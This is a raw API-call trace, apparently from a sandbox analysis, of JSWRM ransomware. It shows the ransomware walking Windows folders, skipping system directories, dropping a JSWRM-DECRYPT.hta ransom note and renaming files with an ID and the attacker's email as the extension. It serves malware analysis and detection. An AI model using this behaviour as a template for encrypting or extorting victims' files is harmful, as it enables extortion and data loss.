lstrcmpiW (lpString1="sr-Latn-RS", lpString2=".") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="..") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="...") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="windows") returned -1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="recovery") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="perflogs") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="documents and settings") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="$RECYCLE.BIN") returned 1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="system volume information") returned -1 [0068.676] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="msocache") returned 1 [0068.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.677] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\jswrm-decrypt.hta")) returned 0xffffffff [0068.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.678] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.678] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.679] CloseHandle (hObject=0x454) returned 1 [0068.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\jswrm-decrypt.hta")) returned 0x20 [0068.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.679] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f994ac1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232240 [0068.680] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.680] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f994ac1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.680] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.680] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.680] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f994ac1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f994ac1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f994ac1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.680] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.680] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.680] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.680] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.681] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.681] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080975440826688) returned 0 [0068.681] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.681] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.681] CloseHandle (hObject=0xffffffff) returned 1 [0068.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0068.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0068.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0068.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.682] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e933091, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e933091, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e933091, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.682] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0068.682] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0068.682] lstrcmpiW (lpString1="sv-SE", lpString2=".") returned 1 [0068.682] lstrcmpiW (lpString1="sv-SE", lpString2="..") returned 1 [0068.682] lstrcmpiW (lpString1="sv-SE", lpString2="...") returned 1 [0068.682] lstrcmpiW (lpString1="sv-SE", lpString2="windows") returned -1 [0068.683] lstrcmpiW (lpString1="sv-SE", lpString2="recovery") returned 1 [0068.683] lstrcmpiW (lpString1="sv-SE", lpString2="perflogs") returned 1 [0068.683] lstrcmpiW (lpString1="sv-SE", lpString2="documents and settings") returned 1 [0068.683] lstrcmpiW (lpString1="sv-SE", lpString2="$RECYCLE.BIN") returned 1 [0068.683] lstrcmpiW (lpString1="sv-SE", lpString2="system volume information") returned -1 [0068.683] lstrcmpiW (lpString1="sv-SE", lpString2="msocache") returned 1 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0068.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\jswrm-decrypt.hta")) returned 0xffffffff [0068.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0068.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.684] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.684] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.685] CloseHandle (hObject=0x454) returned 1 [0068.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0068.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\jswrm-decrypt.hta")) returned 0x20 [0068.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.686] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f994ac1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232000 [0068.686] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.686] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, 